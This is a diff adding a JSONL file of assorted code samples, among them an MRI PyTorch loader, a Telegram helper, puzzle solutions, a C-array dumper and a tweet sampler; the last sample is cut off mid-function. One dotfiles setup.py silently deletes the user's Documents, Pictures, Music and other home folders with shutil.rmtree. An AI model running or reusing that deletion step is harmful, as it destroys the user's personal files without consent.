diff --git "a/4566.jsonl" "b/4566.jsonl" new file mode 100644--- /dev/null +++ "b/4566.jsonl" @@ -0,0 +1,633 @@ +{"seq_id":"275409838","text":"from genericpath import exists\nimport os\nimport torch\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import ToTensor\nimport transform_data\n\n\"\"\"\n Class representing the dataset we use for training the neural network\n\"\"\"\n\n# Path to where the OASIS dataset is located\n# If datageneration is true, this is also the location where the other dataset is created\n# NOTE: In principle this is the only thing that has to be changed\npath_to_data = \"Y:\\Datasets\\OASIS I\"\n# Putting the data on your SSD is much faster, unsurprsingly\npath_to_data_storage = r\"C:\\Users\\daan\\Desktop\\datasets\\MRI\"\n\npath_to_data_ = os.path.join(path_to_data_storage, \"transformed\")\npath_to_data_k = os.path.join(path_to_data_storage, \"kspace\")\n\ntraining = \"training\"\nvalidation = \"validation\"\nvalidation_full = \"denoise_validation\"\n\nfull = \"full\"\nmasked = \"masked\"\n\ntraining_path = os.path.join(path_to_data_, training)\nvalidation_path = os.path.join(path_to_data_, validation)\ntraining_path_k = os.path.join(path_to_data_k, training)\nvalidation_path_k = os.path.join(path_to_data_k, validation)\nvalidation_full_path = os.path.join(path_to_data_, validation_full)\n\n# Path to where the training portion of the data is stored\nraw_path = os.path.join(training_path, full)\nmasked_path = os.path.join(training_path, masked)\nraw_path_k = os.path.join(training_path_k, full)\nmasked_path_k = os.path.join(training_path_k, masked)\n\n# Path to where the validation portion of the data is stored\nval_raw_path = os.path.join(validation_path, full)\nval_masked_path = os.path.join(validation_path, masked)\nval_raw_path_k = os.path.join(validation_path_k, full)\nval_masked_path_k = os.path.join(validation_path_k, masked)\n\n# Path where the complete images used for validation are stored\nval_full_raw_path = os.path.join(validation_full_path, full)\nval_full_masked_path = os.path.join(validation_full_path, masked)\n\ndef show_image(img):\n plt.imshow(img, cmap=\"gray\")\n plt.axis(\"off\")\n\nclass MRIDataset_2(Dataset):\n \"\"\" MRI images dataset \"\"\"\n\n def __init__(self, raw_dir, masked_dir, length, transform=None):\n \"\"\"\n Params:\n root_dir: Directory with the images\n \"\"\"\n self.raw_dir = raw_dir\n self.masked_dir = masked_dir\n self.transform = transform\n self.length = length\n self.indices = pd.DataFrame([f\"mri{n}.npy\" for n in range(1,self.length+1)])\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n raw_img_path = os.path.join(self.raw_dir, self.indices.iloc[idx, 0])\n masked_img_path = os.path.join(self.masked_dir, self.indices.iloc[idx, 0])\n\n raw_images = np.load(raw_img_path)\n masked_images = np.load(masked_img_path)\n\n if self.transform is not None:\n raw_images = self.transform(raw_images)\n masked_images = self.transform(masked_images)\n \n return masked_images, raw_images\n\ndef get_dataset(batch_size):\n # NOTE: You have to change the total datasize manually, dont know of a good way for this yet (103680, 38880)\n training_data = DataLoader(MRIDataset_2(raw_path, masked_path, 103680, ToTensor()), batch_size=batch_size, shuffle=True)\n validation_data = DataLoader(MRIDataset_2(val_raw_path, val_masked_path, 38880, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return training_data, validation_data\n\ndef get_dataset_full_image(batch_size):\n data = DataLoader(MRIDataset_2(val_full_raw_path, val_full_masked_path, 160, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return data\n\ndef get_k_space_dataset(batch_size):\n # NOTE: You have to change the total datasize manually, dont know of a good way for this yet (103680, 38880)\n training_data = DataLoader(MRIDataset_2(raw_path_k, masked_path_k, 5120, ToTensor()), batch_size=batch_size, shuffle=True)\n validation_data = DataLoader(MRIDataset_2(val_raw_path_k, val_masked_path_k, 1120, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return training_data, validation_data\n\nif __name__ == \"__main__\":\n\n # NOTE: datageneration is slow, make sure this is only run once\n # see the if name is main part below\n data_generation = False\n val_data_generation = False\n data_generation_k = True\n\n # Make the folders if they are not yet made\n try:\n os.makedirs(path_to_data_, exist_ok=True)\n os.makedirs(path_to_data_k, exist_ok=True)\n except OSError as error:\n pass\n\n try:\n os.makedirs(training_path, exist_ok=True)\n os.makedirs(validation_path, exist_ok=True)\n os.makedirs(training_path_k, exist_ok=True)\n os.makedirs(validation_path_k, exist_ok=True)\n os.makedirs(validation_full_path, exist_ok=True)\n except OSError as error:\n pass\n\n try:\n os.makedirs(raw_path, exist_ok=True)\n os.makedirs(masked_path, exist_ok=True)\n os.makedirs(val_raw_path, exist_ok=True)\n os.makedirs(val_masked_path, exist_ok=True)\n os.makedirs(raw_path_k, exist_ok=True)\n os.makedirs(masked_path_k, exist_ok=True)\n os.makedirs(val_raw_path_k, exist_ok=True)\n os.makedirs(val_masked_path_k, exist_ok=True)\n os.makedirs(val_full_raw_path, exist_ok=True)\n os.makedirs(val_full_masked_path, exist_ok=True)\n except OSError as error: \n pass\n\n if data_generation:\n transform_data.process_data(path_to_data, raw_path, masked_path, val_raw_path, val_masked_path)\n\n if val_data_generation:\n transform_data.create_test_data(path_to_data, val_full_raw_path, val_full_masked_path)\n\n if data_generation_k:\n transform_data.create_k_space_data(path_to_data, raw_path_k, masked_path_k, val_raw_path_k, val_masked_path_k)","sub_path":"neural_network/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"58053819","text":"import time\n\ntry:\n # pip install python-telegram-bot\n import telegram\n from telegram import MAX_MESSAGE_LENGTH, TelegramError\n from telegram.error import BadRequest, NetworkError\nexcept ModuleNotFoundError:\n pass\n\nfrom ..generaltools.blaster_logger import log_this, logger # uses log_this and logger from general/blaster_logger.py\n\n\n@log_this\ndef send_message(\n bot,\n user_id,\n response,\n parse_mode=\"MARKDOWN\",\n reply_markup=None,\n disable_web_page_preview=True,\n):\n \"\"\"\n Sends message to user_id.\n\n Splits message into shorter messages of MAX_MESSAGE_LENGTH (set by Telegram). If message is shorter, splits into\n list of 1 item. Send messages from list. Handles all kinds of possible errors while sending and tries to deliver\n anyway. Doesn't guarantee delivery.\n\n :param bot:\n :param user_id:\n :param response:\n :param parse_mode:\n :param reply_markup:\n :param disable_web_page_preview:\n :return: sent object of the last message sent\n \"\"\"\n\n split_message = _split_message_by_telegram_requirements(response)\n return _send_split_message(\n bot,\n user_id,\n split_message,\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n\n\n@log_this\ndef _send_single_message(\n bot,\n telegram_id,\n message,\n parse_mode=\"MARKDOWN\",\n reply_markup=None,\n disable_web_page_preview=True,\n):\n sent = None\n try:\n sent = bot.send_message(\n chat_id=telegram_id,\n text=message,\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n except BadRequest as e:\n logger.error(f\"{e}: {telegram_id}\")\n except NetworkError:\n logger.error(NetworkError)\n except TelegramError as e:\n error_msg = f\"TelegramError while sending message: {e}\"\n logger.error(error_msg)\n sent = bot.send_message(\n chat_id=telegram_id,\n text=message.replace(\"\\\\\", \"\"),\n parse_mode=None,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n except UnicodeEncodeError as e:\n logger.warning(f\"send_message: {e}\")\n\n return sent\n\n\n@log_this\ndef _split_message_by_telegram_requirements(message):\n chunks, chunk_size = len(message), MAX_MESSAGE_LENGTH\n split_message = [message[i : i + chunk_size] for i in range(0, chunks, chunk_size)]\n return split_message\n\n\n@log_this\ndef _send_split_message(\n bot,\n telegram_id,\n split_message,\n parse_mode=None,\n reply_markup=None,\n disable_web_page_preview=None,\n):\n for i in range(len(split_message)):\n if i < (len(split_message) - 1):\n _send_single_message(\n bot,\n telegram_id,\n split_message[i],\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n time.sleep(1)\n else:\n return _send_single_message(\n bot,\n telegram_id,\n split_message[i],\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n","sub_path":"telegramtools/send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"79688128","text":"#!/usr/bin/env python\nimport shutil\nimport os\nimport argparse\n\ndef file_manager(home):\n# manage all the files\n to_del = ['Documents', 'Pictures', 'Videos', 'Public', 'Templates', 'Music']\n # del files\n for item in to_del:\n shutil.rmtree( home+item, True)\n # now create files\n add_files = ['Go/src/github.com/n7-fury', 'Src', 'Go/bin', 'Go/pkg', 'Files', 'Media/Music', 'Media/Video', 'Media/Pictures']\n for item in add_files:\n try:\n os.makedirs(home + item)\n except OSError:\n pass\n\n\ndef editor(home,nvim=False):\n editor_path = '.vim'\n # copy file, if vim\n if nvim:\n editor_path = '.nvim'\n shutil.rmtree(home+editor_path, True)\n shutil.copytree(os.getcwd()+'/vim', home+editor_path)\n # move nvimrc to vimrc\n if nvim:\n os.replace(home+'.vim/vimrc', home+'.nvim/nvimrc') \n\n\ndef fish_conf(home):\n xdg = os.getenv(\"XDG_CONFIG_HOME\", home+\".config\")\n if not xdg[-1] == '/':\n xdg = xdg + '/'\n shutil.rmtree(xdg+'fish')\n shutil.copytree(os.getcwd()+'/fish', xdg+'fish/')\n\ndef tmux_conf(home):\n shutil.copyfile(os.getcwd()+'/tmux/tmux.conf', home+'.tmux.conf')\n\ndef main():\n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--nvim', dest=\"nvim\", help='vim file',\n action='store_true', default=False)\n args = parser.parse_args()\n\n home = os.getenv(\"HOME\")\n if not home[-1] == \"/\":\n home = home + \"/\"\n file_manager(home)\n editor(home, args.nvim)\n fish_conf(home)\n\nif __name__ == '__main__':\n main()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350545262","text":"def main():\n nums = [10, 15, 3, 7, -10]\n k = -3\n result = doTwoElementsSumToK(nums, k)\n print(result)\n test_negative_case()\n test_positive_case()\n\n\n#Time: O(n) - n constant time insertions and lookups in hash table\n#Add Space: O(n) - store n complements in hash table\ndef doTwoElementsSumToK(numbers, k): \n complements = {}\n for n in numbers:\n if(n in complements):\n return True\n complements[k-n] = True\n return False\n\n#Scaling\n#Two pass approach\n#Divide input across machines\n#Pass #1: populate the shared complement table - coordinate \"done\"\n#Pass #2: listen for \"done\" then check local number list against complements - broadcast result\n\n#Tests\ndef test_positive_case():\n nums = [10, 15, 3, 7]\n k = 17\n assert(doTwoElementsSumToK(nums, k) == True)\n\ndef test_negative_case():\n nums = [10, 15, 3, 7]\n k = 99\n assert(doTwoElementsSumToK(nums, k) == False)\n\nif __name__ == \"__main__\":\n main()","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"235636353","text":"def main():\n pic=makePicture(pickAFile())\n show(pic)\n for px in getPixels(pic):\n r=getRed(px)\n g=getGreen(px)\n b=getBlue(px)\n negColor=makeColor(225-r,225-g,225-b)\n setColor(px, negColor)\n repaint(pic)","sub_path":"JYTHON/class_oct31_negColor.py","file_name":"class_oct31_negColor.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307311295","text":"import sys\nsys.stdin = open('거듭제곱input.txt')\n\nT=10\n\ndef multi(N, M):\n if M==0:\n return 1\n else:\n M-=1\n return N * multi(N,M) \n\nfor tc in range(1, T+1):\n a=input()\n N, M = list(map(int, input().split()))\n res=0\n res=multi(N, M)\n\n print(f'#{tc} {res}')\n","sub_path":"SWexpert/D3/거듭제곱.py","file_name":"거듭제곱.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"190644107","text":"from django.urls import path\nfrom . import views\n\n# base App urls\napp_name= 'base'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('dashboard', views.dashboard, name='dashboard'),\n path('reboot', views.reboot, name=\"reboot\"),\n path('classes', views.classes, name='classes'),\n path('variables', views.variables, name='variables')\n]","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191642101","text":"#-------------------------------------------------------------------------------\n# dump.py\n# Dump binary files into C arrays.\n#-------------------------------------------------------------------------------\n\nVersion = 3\n\nimport sys\nimport os.path\nimport yaml\nimport genutil\n\n#-------------------------------------------------------------------------------\ndef get_file_path(filename, file_path) :\n '''\n Returns absolute path to an input file, given file name and \n another full file path in the same directory.\n '''\n return '{}/{}'.format(os.path.dirname(file_path), filename)\n\n#-------------------------------------------------------------------------------\ndef get_file_cname(filename) :\n return 'dump_{}'.format(os.path.splitext(filename)[0])\n\n#-------------------------------------------------------------------------------\ndef gen_header(out_hdr, files) :\n with open(out_hdr, 'w') as f:\n f.write('#pragma once\\n')\n f.write('// #version:{}#\\n'.format(Version))\n f.write('// machine generated, do not edit!\\n')\n items = {}\n for file in files :\n file_path = get_file_path(file, out_hdr)\n if os.path.isfile(file_path) :\n with open(file_path, 'rb') as src_file:\n file_data = src_file.read()\n file_name = get_file_cname(file)\n file_size = os.path.getsize(file_path)\n items[file_name] = file_size\n f.write('unsigned char {}[{}] = {{\\n'.format(file_name, file_size)) \n num = 0\n for byte in file_data :\n if sys.version_info[0] >= 3:\n f.write(hex(ord(chr(byte))) + ', ')\n else:\n f.write(hex(ord(byte)) + ', ')\n num += 1\n if 0 == num%16:\n f.write('\\n')\n f.write('\\n};\\n')\n else :\n genutil.fmtError(\"Input file not found: '{}'\".format(file_path))\n f.write('typedef struct { const char* name; const uint8_t* ptr; int size; } dump_item;\\n')\n f.write('#define DUMP_NUM_ITEMS ({})\\n'.format(len(items)))\n f.write('dump_item dump_items[DUMP_NUM_ITEMS] = {\\n')\n for name,size in sorted(items.items()):\n f.write('{{ \"{}\", {}, {} }},\\n'.format(name[5:], name, size))\n f.write('};\\n')\n\n#-------------------------------------------------------------------------------\ndef generate(input, out_src, out_hdr) :\n if genutil.isDirty(Version, [input], [out_hdr]) :\n with open(input, 'r') as f :\n desc = yaml.load(f)\n gen_header(out_hdr, desc['files'])\n","sub_path":"fips-files/generators/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86247203","text":"# random.py\n#\n# Copyright (C) 2006-2016 wolfSSL Inc.\n#\n# This file is part of wolfSSL. (formerly known as CyaSSL)\n#\n# wolfSSL is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# wolfSSL is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA\nfrom wolfcrypt._ffi import ffi as _ffi\nfrom wolfcrypt._ffi import lib as _lib\nfrom wolfcrypt.utils import t2b\n\nfrom wolfcrypt.exceptions import *\n\n\nclass Random(object):\n \"\"\"\n A Cryptographically Secure Pseudo Random Number Generator - CSPRNG\n \"\"\"\n def __init__(self):\n self.native_object = _ffi.new(\"WC_RNG *\")\n\n ret = _lib.wc_InitRng(self.native_object)\n if ret < 0:\n self.native_object = None\n raise WolfCryptError(\"RNG init error (%d)\" % ret)\n\n\n def __del__(self):\n if self.native_object:\n _lib.wc_FreeRng(self.native_object)\n\n\n def byte(self):\n \"\"\"\n Generate and return a random byte.\n \"\"\"\n result = _ffi.new('byte[1]')\n\n ret = _lib.wc_RNG_GenerateByte(self.native_object, result)\n if ret < 0:\n raise WolfCryptError(\"RNG generate byte error (%d)\" % ret)\n\n return _ffi.buffer(result, 1)[:]\n\n\n def bytes(self, length):\n \"\"\"\n Generate and return a random sequence of length bytes.\n \"\"\"\n result = _ffi.new('byte[%d]' % length)\n\n ret = _lib.wc_RNG_GenerateBlock(self.native_object, result, length)\n if ret < 0:\n raise WolfCryptError(\"RNG generate block error (%d)\" % ret)\n\n return _ffi.buffer(result, length)[:]\n","sub_path":"components/hap/wolfssl/wrapper/python/wolfcrypt/wolfcrypt/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"148791925","text":"import logging\nfrom functools import lru_cache\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_adapter_input(adapters):\n # Separate by lines, convert to integer, prepend the initial adapter (0) and append the final adapter (max + 3)\n adapters = [0] + sorted(int(x) for x in adapters.split(\"\\n\") if x)\n adapters.append(max(adapters) + 3)\n\n return adapters\n\n\ndef get_adapter_differences(adapters):\n # Given all adapters need to be used, this is just a matter of sorting them and computing the differences\n adapters = parse_adapter_input(adapters)\n adapters_delta = [adapters[i + 1] - adapters[i] for i in range(len(adapters) - 1)]\n\n return adapters_delta\n\n\ndef get_adapter_path_count(adapters):\n # Parse and convert adapters to tuple (because lru_cache decorated functions need hashable arguments)\n adapters = tuple(parse_adapter_input(adapters))\n return get_adapter_path_count_priv(adapters)\n\n\n@lru_cache()\ndef get_adapter_path_count_priv(adapters, current=0):\n # Get the next adapter indices\n next_indices = [x for x in range(current + 1, current + 4) if x < len(adapters)]\n\n # If there are no more indices, we're at base case so return 1\n if not next_indices:\n return 1\n\n # Otherwise, sum all branches from matching adapters (according to <= 3 criteria)\n return sum(\n get_adapter_path_count_priv(adapters, i)\n for i in next_indices\n if adapters[i] - adapters[current] <= 3\n )\n","sub_path":"day10/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"212608567","text":"import networkx as nx\nfrom experiments.utils.pickle_tools import pickle_dump, pickle_load\n\nfrom pprint import pprint\n\n\ndef xtalk_scoped_bprop(backend, xtalk_property=None, num_requird_hw_qubits=None):\n \"\"\"\n クロストークコンパイラの性能評価のために、、\n クロストークを必ず含むような量子ビット, 量子ビットconnectionのセットを残して、\n 実験で利用できるQPUリソースを制限する。(backend_propertyを変更する)\n\n pass_managerの内部で使用される、backend_prop.gates と backend_prop.qubits だけを変更する。\n\n Args:\n backend : IBMQBackend\n xtalk_property :\n num_requird_hw_qubits : 後の実験で使用したい量子ビット数\n Returns:\n backend_property scope on backend xtalk characteristics\n \"\"\"\n\n if xtalk_property is None and num_requird_hw_qubits is None:\n return _choose_topology_byhand(backend)\n\n backend_prop = backend.properties()\n xtalk_ratio_graph = nx.Graph()\n\n # プロセッサの xtalk ratio グラフを作る\n for ginfo in backend_prop.gates:\n if ginfo.gate == \"cx\":\n xtalk_ratio = 1.0\n xtalk_ratio_graph.add_edge(\n ginfo.qubits[0], ginfo.qubits[1], wight=xtalk_ratio\n )\n \"\"\"TODO\n xtalk_propertyに基づき、\n xtalkがcx error率に与える影響をxtalk_ratioに反映させ、\n xtalk_ratio_graphを完成させる\n \"\"\"\n\n # xtalk_ratio_graphに基づき、\n # 実験で使いたい量子ビット、2量子ゲートを選定する\n qubits_exp = []\n gates_exp = []\n\n # 実験に不要な 量子ビット 、  2量子ゲート を削除する\n #     bprop.qubits() bprop.gates()\n\n return backend_prop\n\n\ndef _choose_topology_byhand(backend):\n \"\"\"\n ibmq_toronto 2020 / 10 / 12 時点\n クロストークの影響が強い量子ビット、2量子ゲートを選択\n \"\"\"\n\n selected_qubits = [\n # 2,\n # 3,\n # 4,\n 5,\n 7,\n 8,\n 10,\n 11,\n 12,\n 13,\n 14,\n 15,\n 16,\n 18,\n 19,\n 21,\n 22,\n 23,\n 24,\n 25,\n 26,\n ]\n selected_edges = [\n # (0, 1), (1, 0),\n # (1, 2), (2, 1),\n # (1, 4), (4, 1),\n # (2, 3),\n # (3, 2),\n # (3, 5), (5, 3),\n # (4, 7), (4, 7),\n (5, 8),\n (8, 5),\n # (7, 6), (6, 7),\n (7, 10),\n (10, 7),\n (8, 11),\n (11, 8),\n # (8, 9), (9, 8),\n (10, 12),\n (12, 10),\n (11, 14),\n (14, 11),\n (12, 13),\n (13, 12),\n (12, 15),\n (15, 12),\n (13, 14),\n (14, 13),\n (14, 16),\n (16, 14),\n (15, 18),\n (18, 15),\n # (16, 19), (19, 16),\n # (18, 17), (17, 18),\n # (18, 21), (21, 18),\n # (19, 20), (20, 19),\n (19, 22),\n (22, 19),\n (21, 23),\n (23, 21),\n (22, 25),\n (25, 22),\n (23, 24),\n (24, 23),\n (24, 25),\n (25, 24),\n (25, 26),\n (26, 25),\n ]\n\n _backend_prop = backend.properties()\n _backend_conf = backend.configuration()\n\n num_hw_qubit = _backend_conf.n_qubits\n hw_qubits = [q for q in range(num_hw_qubit)]\n\n # eliminate unseledted qubits from _backend_prop\n for hw_qubit in reversed(hw_qubits):\n if hw_qubit not in selected_qubits:\n del _backend_prop.qubits[hw_qubit]\n\n # eliminate unselected gates from _backend_prop\n gates = []\n for ginfo in _backend_prop.gates:\n if ginfo.gate == \"cx\":\n if ginfo.qubits in selected_edges:\n gates.append(ginfo)\n if (\n ginfo.gate == \"id\"\n or ginfo.gate == \"u1\"\n or ginfo.gate == \"u2\"\n or ginfo.gate == \"u3\"\n ):\n if ginfo.qubits[0] in selected_qubits:\n gates.append(ginfo)\n\n _backend_prop.gates = gates\n\n return _backend_prop\n","sub_path":"compiler/utils/experimental_backend_regulation.py","file_name":"experimental_backend_regulation.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228435403","text":"#!/usr/bin/env python3\n\"\"\"\nNormalizes and tokenizes every sentence in a corpus using the Moses normalizer and tokenizer.\n\nTakes three arguments:\n* the language of the corpus (language code)\n* the path to the corpus file\n* the path to the output file\n\"\"\"\nfrom sacremoses import MosesPunctNormalizer, MosesTokenizer\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"lang\", type=str, help=\"Language of the corpus\")\nparser.add_argument(\"f_in\", type=str, help=\"Path to the corpus\")\nparser.add_argument(\"f_out\", type=str, help=\"Output path\")\n\nargs = parser.parse_args()\n\nnormalizer = MosesPunctNormalizer(args.lang)\ntokenizer = MosesTokenizer(args.lang)\n\nwith open(args.f_in, 'r', encoding='UTF-8') as f_in, open(args.f_out, 'w', encoding='UTF-8') as f_out:\n for line in f_in:\n line = line.strip()\n if line != '':\n line = normalizer.normalize(line)\n line = tokenizer.tokenize(line, return_str=True, escape=False)\n f_out.write(line + '\\n')\n","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71142726","text":"from qualifier.output_data import OutputData\nfrom qualifier.schedule import Schedule\nfrom qualifier.strategy import Strategy\n\n\nclass AtleastOneCar(Strategy):\n name = 'AtleastOneCar'\n\n def solve(self, input_data):\n\n streets_with_cars = self.streets_with_car_at_light(input_data)\n\n schedules = []\n for intersection in input_data.intersections:\n trafic_lights = []\n for street in intersection.incoming_streets:\n if street.name in streets_with_cars:\n trafic_lights.append((street.name, 1))\n\n schedule = Schedule(intersection.index, tuple(trafic_lights))\n schedules.append(schedule)\n\n return OutputData(tuple(schedules))\n","sub_path":"qualifier/strategies/AtleastOneCar.py","file_name":"AtleastOneCar.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"643647390","text":"'''\nCreated on Apr 25, 2017\n\n@author: dicle\n'''\n\nimport os, json\nimport random\nimport string, re\n\nfrom dataset import io_utils\n\n# counts the tweets in the given folder which has days as subfolders\ndef count_tweets(folderpath, outfolder):\n \n N = 0\n Nr = 0\n Ntr = 0\n \n days = io_utils.getfoldernames_of_dir(folderpath)\n \n print(folderpath)\n for day in days:\n \n p1 = os.path.join(folderpath, day)\n \n fnames = io_utils.getfilenames_of_dir(p1, removeextension=False)\n \n for fname in fnames:\n \n p2 = os.path.join(p1, fname)\n '''\n lines = open(p2, \"r\").readlines()\n nlines = len(lines)\n '''\n \n tweets = lines2tweets(p2)\n ntweets = len(tweets)\n \n tr_tweets = count_lang_tweets(tweets, lang=\"tr\")\n ntrtweets = len(tr_tweets)\n \n plain_tweets = count_nonreply_tweets(tr_tweets)\n nptweets = len(plain_tweets)\n \n print(\" \", day,\" / \", fname, \" # lines: \", ntweets, \" # tr_tweets: \", ntrtweets, \" # non-reply tweeets: \", nptweets)\n \n N += ntweets\n Nr += nptweets\n Ntr += ntrtweets\n \n \n if ntrtweets > 0:\n outpath_tr = os.path.join(outfolder, day+\"_\"+fname)\n json.dump(tr_tweets, open(outpath_tr, \"w\"))\n \n if nptweets > 0:\n outpath_nr = os.path.join(outfolder, day+\"_\"+fname+\"-nonreply\")\n json.dump(plain_tweets, open(outpath_nr, \"w\"))\n \n return N, Ntr, Nr\n \n \n\ndef lines2tweets(filepath):\n \n lines = open(filepath, \"r\").readlines()\n \n lines = [line.strip() for line in lines]\n \n tweets = [json.loads(line) for line in lines]\n \n return tweets\n\n \ndef count_lang_tweets(tweets, lang=\"tr\"): \n\n lang_tweets = []\n\n for tweet in tweets:\n \n tlang = tweet[\"gnip\"][\"language\"][\"value\"]\n if tlang == lang:\n lang_tweets.append(tweet)\n \n return lang_tweets\n \n\ndef count_nonreply_tweets(tweets):\n \n plain_tweets = []\n \n for tweet in tweets:\n \n keys = list(tweet.keys())\n \n if \"inReplyTo\" not in keys:\n plain_tweets.append(tweet)\n\n return plain_tweets\n\n\n\ndef _sample_N_tweets(folderpath, N, filtrate=None, keywords=None):\n\n print(folderpath)\n fnames = io_utils.getfilenames_of_dir(folderpath, removeextension=False)\n \n fnames = [i for i in fnames if i.endswith(\"-nonreply\")]\n\n all_tweets = []\n for fname in fnames:\n \n p = os.path.join(folderpath, fname)\n tweets = json.load(open(p, \"r\"))\n all_tweets.extend(tweets)\n #print(fname, len(tweets), len(all_tweets))\n \n if filtrate and keywords:\n all_tweets = filtrate(keywords, all_tweets)\n \n random.shuffle(all_tweets)\n print(len(all_tweets), N)\n selected_tweets = random.sample(all_tweets, min(len(all_tweets), N))\n return selected_tweets\n\n\n\ndef ignore_containing(keywords, tweets):\n \n filtrated_tweets = []\n for tweet in tweets:\n _text = tweet[\"body\"]\n \n accept = True\n for keyword in keywords:\n if re.search(keyword, _text, re.IGNORECASE):\n accept = False\n pass\n \n if accept:\n filtrated_tweets.append(tweet) \n \n \n return filtrated_tweets\n\ndef select_tweets():\n \n sep = \";\"\n inroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/tr_tweets\"\n outroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/selections\"\n #folders = [\"tr_201301\", \"tr_201302\", \"tr_201303\"]\n folders = [\"tr_201302\", \"tr_201303\", \"tr_201301\"]\n N = 700\n \n stweets = []\n for folder in folders:\n fpath = os.path.join(inroot, folder)\n tweets = _sample_N_tweets(fpath, N, ignore_containing, keywords=[\"ttnet_muzik\", \"ttnet müzik\", \"I'm at\"])\n print(\" \", len(tweets))\n stweets.extend(tweets)\n \n\n rows = []\n print(\"stweets: \", len(stweets))\n for tweet in stweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n \n _text = _text.replace(\";\", \",,,\") # replace semicolon\n # replace url ??\n \n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n print(df.shape)\n outpath = os.path.join(outroot, \n str(df.shape[0])+\"tweets_\"+str(random.choice(range(100)))+\"\".join(random.sample(string.ascii_letters, 4))+\".csv\") \n \n df.to_csv(outpath, sep=sep, index=False)\n\n\n\n\ndef tweets2csv(tweets):\n \n header = [\"id\", \"link\", \"body\"]\n \n rows = []\n \n for tweet in tweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n return df\n\n\n'''\ndef tweets2csv(inpath, outpath):\n \n header = [\"id\", \"link\", \"body\"]\n \n rows = []\n \n tweets = json.load(open(inpath, \"r\"))\n \n for tweet in tweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n df.to_csv(outpath, sep=\"\\t\", index=False)\n\n''' \n\nif __name__ == '__main__':\n \n '''\n inroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/\"\n outroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/tr_tweets\"\n folders = [\"201302\", \"201303\"]\n\n for foldername in folders:\n infolderpath = os.path.join(inroot, foldername)\n outfolderpath = io_utils.ensure_dir(os.path.join(outroot, \"tr_\"+foldername))\n n, tr, nr = 